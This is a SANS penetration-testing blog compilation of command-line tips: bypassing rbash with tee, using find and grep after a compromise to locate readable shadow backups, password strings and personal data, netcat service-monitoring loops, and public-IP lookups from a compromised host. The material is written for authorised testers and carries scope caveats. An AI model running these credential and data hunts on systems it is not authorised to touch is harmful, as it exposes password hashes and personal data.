SANS Poster – White Board of Awesome Command Line Kung Fu (PDF Download)

 

by: SANS Pen Test Team

Imagine you are sitting at your desk and come across a great command line tip that will assist you in your career as an information security professional, so you jot the tip down on a note, post-it, or scrap sheet of paper and tape it to your white board… now imagine you do this all the time until your white board is completely full of useful tips you’ve found and can use daily.

That is the concept behind the SANS Pen Test Poster: White Board of Awesome Command Line Kung-Fu created by the SANS Pen Test Instructors. Each tip was submitted by the Pen Test Instructors and curated by SANS Fellow, Ed Skoudis.

We are giving you a complete white board full of tips you can use to become a better InfoSec professional.

Now it is available for you to download.

Download PDF – PENT-PSTR-WHITEBOARD-V3-0118_web.pdf

PENT-PSTR-WHITEBOARD-V3-0118_web_small

PENT-PSTR-WHITEBOARD-V3-0118_web_small_back

 

Additional Educational Posts based on the Poster:

Python:

“White Board” – Python – Python Debugger
“White Board” – Python – Python Reverse Shell!
“White Board” – Python – Pythonic Web Server
“White Board” – Python – Raw Shell -> Terminal
“White Board” – Python – Pythonic Web Client

Bash:

“White Board” – Bash – Useful IPv6 Pivot
“White Board” – Bash – Encrypted Exfil Channel!
“White Board” – Bash – What’s My Public IP Address?
“White Board” – Bash – Bash’s Built-In Netcat Client
“White Board” – Bash – Check Service Every Second
“White Board” – Bash – Make Output Easier to Read
“White Board” – Bash – Website Cloner
“White Board” – Bash – Sudo… Make Me a Sandwich
“White Board” – Bash – Find Juicy Stuff in File System

CMD.exe:

“White Board” – CMD.exe – C:\> netsh interface
“White Board” – CMD.exe – C:\> wmic process

PowerShell:

“White Board” – PowerShell – Add a Firewall Rule
“White Board” – PowerShell – Built-in Port Scanner!
“White Board” – PowerShell – Get Firewall Rules
“White Board” – PowerShell – One-Line Web Client
“White Board” – PowerShell – Ping Sweeper!
“White Board” – PowerShell – Find Juicy Stuff in the File System

 

Desktop Wallpapers based on Poster:

Bash, PowerShell, Python…

Python_1280x1024(example)

 

SANS Pen Test Training:

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

A Spot of Tee

The Restricted Bash Shell

By Daniel Pendolino
Counter Hack

The Bash shell is a nearly ubiquitous way to interact with a Linux console. A little know feature is the restricted Bash shell, which you can invoke by calling rbash or bash --restricted. While it isn’t something you would normally opt into, it certainly a situation I’ve been placed in due to strict polices or limited device resources. Here are some of the limitations imposed:

  • Setting or unsetting the values of the SHELL, PATH, ENV, or BASH_ENV variables.
  • Specifying command names containing slashes.
  • Specifying a filename containing a slash as an argument to the . builtin command.
  • Specifying a filename containing a slash as an argument to the -p option to the hash builtin command.
  • Importing function definitions from the shell environment at startup.
  • Parsing the value of SHELLOPTS from the shell environment at startup.
  • Redirecting output using the ‘>’, ‘>|’, ‘<>’, ‘>&’, ‘&>’, and ‘>>’ redirection operators.
  • Using the exec builtin to replace the shell with another command.
  • Adding or deleting builtin commands with the -f and -d options to the enable builtin.
  • Using the enable builtin command to enable disabled shell builtins.
  • Specifying the -p option to the command builtin.
  • Turning off restricted mode with ‘set +r’ or ‘set +o restricted’.

Selection_031

Dotting I’s and Crossing Tees

Tee is a wonderful utility that soaks up stdin and sends it all to a file along with stdout. It’s just the trick to get around a restricted shell where I/O redirection is being blocked. With tee it’s possible to bypass rbash‘s I/O restrictions and send arbitrary data to a file.

Selection_032

Tee can even be used to append data to a file with the -a flag.

-Daniel Pendolino
Counter Hack

Bash restrictions sourced from gnu.org

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Find Juicy Stuff in the File System

Board Elements_clean_Find Juicy Stuff in the File System-05

By Matthew Toussain, Geoff Pamerleau

Pilfering data is a post-exploitation phase that rarely receives enough credit. As pentesters, the way we demonstrate security risk and the way we escalate our attacks to a new level is based entirely on what we find after the compromise is realized. While manually driving the command line from directory to directory in an endless cycle of cd and ls, is a possible solution it hardly scales to an enterprise of hundreds of systems. The first step is to key in on target data types: Do users keep usernames or passwords in text files? Are there configurations we can read that might contain database credentials or hashes? Could there be email addresses or phone numbers to pilfer for use in social engineering efforts? With a little bash-fu we can get the answers to these questions and many more with relatively little effort.

 

Methods Covered in this Section:

find filtering by path, filename, and permissions

find /path -iname "FILTER" -perm PERM

find with flags used to list or delete files found

find /path -iname "FILTER" -ls

find with grep to quickly identify files of interest

find /path -iname "FILTER" -exec grep -i "CONTENT" {} \;

 

Find FTW

The find command is an incredibly powerful tool available on most Unix derived systems. With it we can quickly search the filesystem to find interesting files. At its simplest, we can use the find command to locate files based on file attributes such as modified, accessed or created times, ownership and access attributes, and file type. When searching by file name we can use either the -name or -iname flags. The flags function the same except for the -iname flag makes our search case-insensitive. When using the flags we use glob expressions. So if we want to search the whole filesystem for any copies of the shadow file something like the following would work:

find filtering by path or filename:
find / -iname "shadow*"

findjuicy01Permission denied errors are no fun

 

Command Breakdown:

find / -iname "shadow*"

1. find - Command line tool to search for files
2. / - The path that we want to initiate our find from; starting from / will search the entire filesystem
3. -iname - Perform case insensitive search of file names
4. "shadow*" - The shell pattern supplied to -iname; files like /etc/shadow or /etc/shadow.bak will match but /etc/gshadow would not. Note: unlike normal shell expansion leading '.' will be matched by the * character.

 

When running as a non root user we will frequently get ‘Permission denied’ errors. In that case redirecting standard error to /dev/null should help us prettify our results. If we want to get a more traditional ls style output for each of the files found by our find command we can use the -ls flag. The fleshed out version of our previous command might now look like this:

find with flags used to list or delete files found (w/error redirection)
find / -iname "shadow*" -ls 2>/dev/null

findjuicy02The permission denied errors are gone

 

What if we want to filter for only the files we have the appropriate level of access to actually use? Consider this: Let us say we have an unprivileged account on the target and we are not in the shadow or root groups. We can filter results with the -perm flag to find only files where the read flag has been set for others. In order to make this permissions search non-exclusive, that is if the read and write flag is set for others we still want to see it, we have to specify the permissions that we are looking for starting with a “/”. So our previous command might now look like this:

 

find results can also be filtered by file permissions as well (-perm) flag
find / -iname "shadow*" -perm /o+r -ls 2>/dev/null

findjuicy03

 

We filtered out the /etc/shadow file that was not readable to us due to restrictive permissions. Now we can see that there is a shadow backup file that is world readable! Go grab those hashes and elevate privileges!

 

Content is King!

The find command supports many flags that determine what gets done to each file found by our search parameters. In addition to the -ls flag which performs an ls on matching files and the -delete flag which will delete any matching files there is the -exec flag. This flag allows us to run an arbitrary command against each file found from the original find command. By using -exec to run grep or egrep on each of the files that our find command locates we can quickly search the file system for email addresses, database passwords, or really any other content of interest that a regular expression can be written to match on.

We can combine the previous find knowledge with -exec to look for all .txt files containing a defined password field or variable name with something like:

find with grep to search for strings inside of files:
find /home -iname "*.txt" 2>/dev/null -exec grep -i 'pass' {} \;

findjuicy04Holy Wall-of-Text Batman! Let’s simplify the output to make things easier

 

Command Breakdown:

find /home -iname "*.txt" 2>/dev/null -exec grep -i 'pass' {} \;

1. find /home -iname "*.txt" 2>/dev/null - same old find-fu from before
2. -exec COMMAND - Specify an arbitrary command to run on each file.
3. {}\; - When using -exec the '{}' will be replaced by the currently found file. Note that the ending ';' needs to be escaped with the ‘\’ character.

 

That was a lot of output, if we just want to see which files contained what we were grepping for we can modify our grep command with the -l flag to list the file instead of the matching line:

 

find with grep to quickly identify files of interest:
find /home -iname "*.txt" 2>/dev/null -exec grep -li 'pass' {} \;

findjuicy05Not perfect but much easier to see which files might contain the information we want

 

What about if we wanted to search for something a bit more specific than just the phrase ‘pass’ in a file? Well with -exec and egrep we can search for any content that we can make a regex for. How about checking for email addresses?

 

find with egrep to quickly identify files of interest using regular expressions:
find /home -iname "*.txt" 2>/dev/null -exec egrep -li "^.+@.+$" {} \;

findjuicy06

Note: grep -E could be used instead of egrep

 

We can use the cat command to explore the contents of each of these files, and grep -C # to filter for a certain number of lines above and below the desired string. This technique is extremely helpful when searching for contextual information that may not be on the exact same line as our search filter.

Browsing through regular expression sites like http://www.regexlib.com/ can lead to some useful expressions to help us find all sorts of things like email addresses, social security numbers, md5 hashes, UUIDs, phone numbers, and credit card numbers.

NOTE: Some of this information can be highly privileged (especially based on host nation privacy restrictions). Accessing PII and HIPAA information from third party systems can lead to accreditation and compliance troubles. Please exercise caution and seek legal advice where appropriate.

When your ROEs, scope, and plan are solid, happy hacking!

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Sudo… Make Me a Sandwich

Board Elements_clean_SudoGǪ Make Me a Sandwich

By Matthew Toussain, Geoff Pamerleau

sudo_makemeasandwich_01

 

The other day, while working on setting up a new virtual machine for testing purposes, I ran the following command to get my networking configured ifconfig enp0s8 down only to be greeted with the following:

 

sudo_makemeasandwich_02

 

GAH! Why do I need root privileges to bring up or down an interface? Why do I need to be root in order to use dhclient to get assigned an IP address via DHCP? Sigh. Well it’s no big issue, I just ran sudo !! to run the last command but this time as root. Ok, that was easy enough. To be honest, accidently running a command without sudo happens more often than I’d like to admit. To make life easier, and to save a few keystrokes in the long run, it can pay dividends to make an alias that will do the equivalent of sudo !!

 

Command Breakdown

alias gah='sudo $(history -p \!\!)'

1. alias - Bash feature that allows us to map a string to a simple command
2. gah - The name of the alias that we are creating
3. ='COMMAND' - What to do when we run gah on the command line. Command defined between single quotes
4. sudo - Command that will allows us to execute the following command as a different user
5. $(history -p \!\!) - Bash evaluated expression that will print out the last command that was run and all supplied arguments.

 

Now when I try to bring the interface back up and forget to use sudo I can just type gah in frustration:

sudo_makemeasandwich_03

 

To make this more permanent I added it to the .bashrc file in my home directory (~/.bashrc) so that it will be available whenever I pull up a terminal.

 

sudo_makemeasandwich_04

One useful alias down… maybe I should finally get around to adding one for gerp=’grep’?

 

While we’re talking productivity, along the same track as the !! operator in bash (repeat the previous command) is: bash_history.

sudo_makemeasandwich_05

The history command lists previous commands, executed commands by number, and can be referenced by running !# to rerun any previous command. This can be extremely useful when scripting in shorthand. For instance, I recently put together an auto upload unpacker script for a webpack and nodejs website we were building. The resulting command was:

rm -rf site.bak/*;cp ndist.tar.gz dist.tar.gz; mv * site.bak/;mv site.bak/wordpress/ ./;cp site.bak/dist.tar.gz ./;tar -xvf dist.tar.gz ;mv dist/* ./;mv site.bak/unpack.sh ./;chmod -R 555 /var/www/site.com/; chmod -R 700 /var/www/site.com/wordpress/;chown -R www-data /var/www/site.com/;rm -rf dist/; rm -rf ndist.tar.gz

But I’d already run each of these commands individually and was looking to compile them into a single bash script. To accomplish that with history I ran this:

echo “rm -rf site.bak/*;!1804; !1805;!1806;!1807;!1756; !1757;!1808;!1809;!1810;!1811;!1812” > unpack.sh && chmod +x unpack.sh

 

Now all I have to do to unpack a new build of the site is run:

./unpack.sh

 

Another great feature of history is its text matching. For instance, I frequently log into my blog’s VPS to tinker. Rather than type out the full ssh command I can execute !ssh. This will run the most recent command in my bash_history beginning with ssh.
sudo_makemeasandwich_06

 

In the above case this could be shortened further to !ss or even !s presuming that the most recent history entry starting with the letter s is the desired command. Endless productivity through bash!

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Make Output Easier to Read

Board Elements_clean_Make Output Easier to Read

By Matthew Toussain, Geoff Pamerleau

Data! DATA!! DATA!!! So much data… an endlessly grueling component of every information security practitioner’s job description is data analysis. Often, digging through an environment for vulnerabilities or configuration flaws involves scrounging through reams of log data. It is not uncommon to find your eyes glazing over while staring at giant walls of text on plain backgrounds and contemplating how exactly your life choices have landed you… here. What could make your gray text on black background daydreams better? Rainbows of course!

makeoutput_easier01

Getting pygmentize…

Wait, what? That’s right, pygmentize is not a part of the standard build for most Linux operating systems you need to install it first. Kali Linux is an exception to this rule and is generally packaged with pygmentize included out of the box. On Linux distributions in the Debian family (Ubuntu, Kali, Raspbian, TAILS) pygmentize can be installed like this:

sudo apt-get install python-pygments

 

Methods Covered in this Section

pygmentize specifying theming:

pygmentize -O bg=dark,style=colorful /path/to/file

pygmentize files without a specified file extension (and optional piping to less)

pygmentize -g /path/to/file | less -R

 

Pygments is a generic syntax highlighter suitable for use in code hosting, forums, wikis or other applications that need to prettify source code. Highlights are:

  • a wide range of over 300 languages and other text formats is supported
  • special attention is paid to details that increase highlighting quality
  • support for new languages and formats are added easily; most languages use a simple regex-based lexing mechanism
  • a number of output formats is available, among them HTML, RTF, LaTeX and ANSI sequences
  • it is usable as a command-line tool and as a library
  • … and it highlights even Perl 6!

From the pygments home page: http://pygments.org

Using pygmentize is very straightforward:

 

makeoutput_easier02Normal. Drab. Bash.

makeoutput_easier03PYGMENTIZE!

 

Pygmentize adds a splash of color with a single command!

 

To make pygmentize even less cumbersome we can add the following alias for “color cat” to our .bashrc:

 

alias ccat='pygmentize -O bg=dark,style=colorful'

NOTE: If you use a light colored terminal background try bg=light for easier readability

 

Now for colorful cat output we just need to run ccat.

makeoutput_easier04

 

As you can see in the above output chain ccat is quite handsome! Until it is not… Sometimes when running pygmentize you might see the following error:

makeoutput_easier05#fail

 

To solve this error we just need to add the -g (guess) flag. The guess flag will attempt to use the contents of the file to guess how syntax highlighting should be performed.

makeoutput_easier06Not perfect but at least it’s colorful

 

The last pygmentize tidbit is how to colorize files that are too large to see the contents all at once (the previous /etc/passwd file for example). Normally, this can be handled by piping the command output into less:

ccat -g /etc/passwd | less

makeoutput_easier07Well that’s… interesting

 

The ANSI color escape sequences used by pygmentize are lost when less tries to print them out. In order to work around this we can use the -R flag to preserve raw control characters.

ccat -g /etc/passwd | less -R

makeoutput_easier08Much better

 

Conclusion

While pygmentize doesn’t functionally add much to our pentesting tool belt it is a simple way to make working with text files a bit less drab and perhaps somewhat more fabulous!

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – Check Service Every Second

 

Board Elements_clean_Check Service Every Second

By Matthew Toussain & Geoff Pamerleau

 

If you’ve had the opportunity to take SANS 560, Network Penetration Testing and Ethical Hacking, chances are you were exposed to the Pentester’s Pledge. The pledge, for those who aren’t familiar is:

“I , do hereby pledge to use psexec to exploit Windows target machines after I have gained admin credentials and SMB access to the target environment. I shall forsake other service-side exploits thereafter. Otherwise, I unnecessarily risk crashing target systems”.

As penetration testers, we have been endowed with the unalienable right to own all the systems (within our scope and rules of engagement of course). Cereal Killer, a whimsical character in the 1995 Hackers film, sums it up best during one of his ecclesiastical moments of clarity: “Listen, we got a higher purpose here, alright? A wake up call for the Nintendo Generation. We demand free access to data, well, it comes with some responsibility.”

This responsibility is simple and it is not unique to our industry. Consider the Hippocratic Oath, which belies the medical principle of primum non nocere (do no harm). Like doctors, information security practitioners should perform with the lightest of touches. A heavy handed approach to security assessments, can lead to dire consequences side effects of pentest may include drowsy computers, frantic IT department parents, and in some cases death. Death! Yes, death, that eternal bit bucket where Google projects go to die in their hundreds. That means instead of breaking down doors with exploits, consider using the keys, after you’ve stolen them first of course!

In the end, though, light touches may not always be enough. When it comes to preventing a headache from escalating into a full blown migraine, vigilance is key. The sooner we can identify an unfortunate outage; the more quickly we can work with our clients to minimize any potential damage. Now, let’s examine a few methods to bake rapid response actions into the penetration tester’s toolkit.
check01

Methods Covered in this Section:

Check service heartbeat:

nc -vv -z -w3 192.168.86.151

Check service every second bash loop:

while (true); do nc -vv -z -w3 10.0.0.1 80 >/dev/null && echo -e “Service is up”; sleep 1; done

Service UP/DOWN bash loop via OR:

while (true); do nc -vv -z -w3 10.0.0.1 80 2>/dev/null && echo -e SERVICE UP || echo -e SERVICE DOWN; sleep 1; done

 

Checking the Pulse

If the end goal is to have bash notify us the moment a service goes down, the first step is to figure out how to tell if it is up vs down. One of the easiest ways for us to check its status is to simply connect to it with a nc. Assuming that we’re planning on exploiting a target located at 192.168.86.151 on port 445, we could run the following to see that the service is still up:

Check service heartbeat:
nc -vv -z -w3 192.168.86.151 445

If the service is up we would see something like:

check01a

 

Command Breakdown

nc -vv -z -w3 192.168.86.151 445

1. nc - netcat is a tool that makes tcp connections given IP and PORT
 2. -vv - Print output in double verbose mode
 3. -z - execute in zero I/O mode. Without the -z option our nc connection to the victim machine on 445 would wait for input from the user, using the -z simply terminates the connection once it is established without sending any data.
 4. -w3 - Set connect timeout to 3s
 5. 192.168.86.151 145 - Destination IP PORT

While the above command could be run repeatedly (manually) to check the status of the service before, during, and after each exploitation attempt it would be easier to wrap the whole thing in one big bash while loop.
while (true); do…

Doing or checking something over and over again, endlessly sounds like a gloomy task for a person, but it suits computers just fine. Scripting languages like bash exist to help us solve a problem once and never worry about it again. The key to accomplishing this is often repetition. In computer logic, a loop allows us to do something over and over until a certain condition has been met. But what happens if we give the loop a condition that never proves true? In bash we can achieve infinite repetition like this:

check02

1 is always less than 2 (-le) so the script will forever print “Hello World”

 

To make this more straightforward we can use something called a boolean operator. In this case, the word true will do. We can also run the entire thing on one line using the command separator: ;

check03

Other operators we could use to build an infinite loop include: while : and while (true). Effectively, our template for running “things” is:

while true; do [thing]; [thing]; [thing]; done

 

Putting this all together gives us a powerful bash one-liner like this:

Check service every second bash loop:
while (true); do nc -vv -z -w3 10.0.0.1 80 >/dev/null && echo -e “Service is up”; sleep 1; done

check04

As you can see the nc connection attempt responds with “Connection refused” as soon as the service, in this case a webserver, goes down.

 

Command Breakdown

while (true); do nc -vv -z -w3 10.0.0.1 80 >/dev/null && echo -e “Service is up”; sleep 1; done

1. while (true) - Begin the infinite loop
2. do nc -vv -z -w3 10.0.0.1 80 - Check service status
3. >/dev/null && echo -e - Suppress connection output and echo success to stdout
4. sleep 1 - Pause for 1 second before moving on
5. done - Finish the loop, and start back at the beginning

 

Success && || (and/or) Failure

For cleaner output we could suppress the output of the connection test and echo status messages based off of whether the last command was successful. Adding on the || (OR) operator allows us to make the service respond in a customizable fashion when the connection is refused:

Service UP/DOWN bash loop via OR:
while (true); do nc -vv -z -w3 10.0.0.1 80 2>/dev/null && echo -e SERVICE UP || echo -e SERVICE DOWN; sleep 1; done

check05

Command Breakdown

while (true); do nc -vv -z -w3 localhost 80 2>/dev/null && echo -e SERVICE UP || echo -e SERVICE DOWN; sleep 1; done

1. while (true)...SERVICE UP - See previous command breakdown
2. do nc -vv -z -w3 10.0.0.1 80 - Check service status
3. || - The && operator means: “run the following if the previous executed successfully” || executes if it did not (connection refused)

 

Bonus – Leveraging the Environment

What if checking a service’s status is not as simple as port UP/DOWN? Emily Cole (@unixgeekem) has some additional advice on the subject. Specifically, leverage the environment to gather additional telemetry on what may be going on. Techniques like tail -f against server logs or direct monitoring of syslogs and SEIM data can provide extra situational awareness. Occasionally, you may already have this access through past exploitation, but in the case of highly sensitive or production systems consider working with the host organization to have this access included in the rules of engagement up front. This might feel like giving away the keys, but remember: primum non nocere.

Matthew Toussain
https://twitter.com/0sm0s1z

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

 

SANS Penetration Testing: Command Line Kung-Fu – Desktop Wallpapers

PenTest_WhiteBoard_Back_Preview

SANS Pen Test: Command Line Kung-Fu

Desktop Wallpapers

So… we made our new SANS Pen Test Poster: “White Board of Awesome Command Line Kung-Fu” and posted it on Twitter for some initial feedback and  someone asked us if we could turn it into a desktop wallpaper and we thought, “that’s a really cool idea!”

But, we created it and everything on it was too small and although it looked cool, it wasn’t functional. So, then we thought, what if we broke it up into individual pieces. “Eureka!” we exclaimed as we contacted our graphic designer with a new request.

Now… “BEHOLD!”

Introducing the first of many SANS Pen Test Curriculum Desktop Wallpapers!

(Click on the image for the full-sized version)

BASH_1280x1024BASH_1280x1024
BASH_1920x1080BASH_1920x1080
BASH_5120x2880BASH_5120x2880
Powershell_1280x1024Powershell_1280x1024
Powershell_1920x1080Powershell_1920x1080
Powershell_5120x2880Powershell_5120x2880
Python_1280x1024Python_1280x1024
Python_1920x1080Python_1920x1080
Python_5120x2880Python_5120x2880

 

Comment below if you have ideas for future SANS Penetration Testing Curriculum – Desktop Wallpapers we should make.

Thanks!

 

Pen Test Cheat Sheets:

SANS Pen Test Training:

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Pen Test Poster: “White Board” – Bash – What’s My Public IP Address?

Board Elements_clean_WhatGÇÖs My Public IP address-

By Matthew Toussain, Geoff Pamerleau

 

Introduction

After hours of digging, you finally reach your goal and exclaim, “I GOT SHELL!”  You brush the dirt off your shoulders and suddenly wonder, “Now what?” Fortunately, if it’s a Unix system, we can leverage the rich functionality that comes with Bash in order to move our pentest along whilst maintaining our shadowy veil.

Let’s first take a moment to evaluate a few potential use cases. The system’s external IP address is often a key piece of information for us to consider. It can help us continually appraise our intrusion campaign to maintain awareness of what systems become compromised so that we remain within the narrow scope of our test. Alternately, we might launch an attack against a DNS name that resolves to multiple host IP addresses on the far end and we need to determine which specific IP address we’ve compromised in order to leverage that access to move laterally within the target environment. Why not just check the IP address assigned to the network interface? As penetration testers most systems we engage live behind a firewall in a Network Address Translation, or NAT environment. In these situations a system’s internal IP address may not accurately reflect how they appear on the Internet. Either way, determining ‘where’ this box is a solid first step in any post-compromise scenario. Let’s look at the some common ways to get this info.

 

Methods Covered in this Section

curl: curl -4 icanhazip.com

wget: wget -qO- ifconfig.me/ip

dig: dig +short myip.opendns.com @resolver1.opendns.com

telnet: telnet myip.gelma.net

telnet + nc:

nc -vlp 9000
telnet [hostname/IP Address] 9000

telnet web client:

telnet ipecho.net 80
GET /plain HTTP/1.1
HOST: ipecho.net

ftp: echo close | ftp ifcfg.me

PowerShell: Invoke-RestMethod http://ipinfo.io/json | Select -exp ip

 

whatsmyip_01

So many options…

For a typical user learning their public IP address is often as simple as a Google search for: ‘what’s my IP’. For us this might also be a viable option however, as pentesters, we’re often confronted with terminal access as opposed to a graphical user interface and web browser. It might seem like a limitation, but with Bash, there is no such thing! There are tons of different utilities that can reach out and get the info we’re interested in. Let’s begin by targeting the simplest and most effective options:

  • IP identification with command line web access utilities
    • curl
    • wget
  • Using DNS to determine our IP address
    • dig

Command Line HTTP External IP Identification

On differentiated Unix type operating systems there are generally two major command line utilities for downloading the content of websites: curl and wget. Depending on which specific flavor is used (e.g. Mac OSX, Ubuntu, etc.), only one or potentially both will be available. For continuity’s sake we’ll discuss both:

 

Command Breakdown

curl: curl -4 icanhazip.com

whatsmyip_02

1. curl - Command line tool that can make web request
2. -4 - Option for curl to prefer IPv4 addresses over IPv6 for domain resolution
3. icanhazip.com - Public domain that returns an IP address when queried

 

Command Breakdown

wget: wget -qO- ifconfig.me/ip

whatsmyip_03

  1. 1. wget - Command line tool that can make web request
  2. 2. -q - Option for wget to run in quiet mode suppressing status output
  3. 3. -O - Option for output - specifies stdout as the output type (O not zero)
  4. 4. ifconfig.co/ip - Public domain that returns an IP address when queried

Occasionally, arbitrary outbound http access is not available. For instance, a network that requires authentication to join could use network access controls (NAC) to redirect all unauthenticated web traffic to a captive portal. Networks using authenticated proxies or whitelisting controls can also provide egress challenges. In these situations outbound DNS traffic is often still required and therefore available. In these cases the dig command has got you covered!

 

Command Breakdown

dig: dig +short myip.opendns.com @resolver1.opendns.com

whatsmyip_04

1. dig - Command line tool for interrogating DNS name servers
2. +short - Option for dig to provide an abbreviated response
3. myip.opendns.com - Host to resolve
4. @resolver1.opendns.com - DNS server to query

 

whatsmyip_05

But wait, there’s more!

So what if curl, wget, and dig are all unavailable? Perhaps the network is blocking opendns.com, ifconfig.me, and icanhazip.com?

telnet and ftp can provide alternative, if clunky, solutions. telnet like nc can make TCP connections to any port specified. This can be used to connect to a server owned by you, to connect to a telnet public ip service (port 23), or connect to a web server as a client. telnet has the added benefit of working from Windows systems as well however, the command must be enabled in order to do so. Some ftp servers respond to failed login requests with the IP address that attempted and failed to connect. We can utilize this behavior to determine public IP address as well.

 

Command Breakdown

telnet: telnet myip.gelma.net

telnet myip.gelma.net
GET /plain HTTP/1.1
HOST: ipecho.net

whatsmyip_06

1. telnet myip.gelma.net - Connect to telnet service that responds with Public IP Address

 

Command Breakdown

telnet + nc:

nc -vlp 9000
telnet [hostname/IP Address] 9000

whatsmyip_07

1. nc -vlp 9000 - Run on your publicly available server to open a listening port
2. telnet [hostname/IP Address] 9000 - Connect to remote netcat listener

Netcat prints information on newly established connections to stdout (Connection from X.X.X.X)

 

Command Breakdown

telnet as a web client: telnet ipecho.net 80

telnet ipecho.net 80
GET /plain HTTP/1.1
HOST: ipecho.net

whatsmyip_08

1. telnet ipecho.net 80 - Connect to web server with telnet
2. GET /plain HTTP/1.1 - HTTP Protocol syntax for GET request
3. HOST: ipecho.net - HTTP Protocol HOST header

 

ftp: echo close | ftp ifcfg.me
whatsmyip_09

 

Bonus

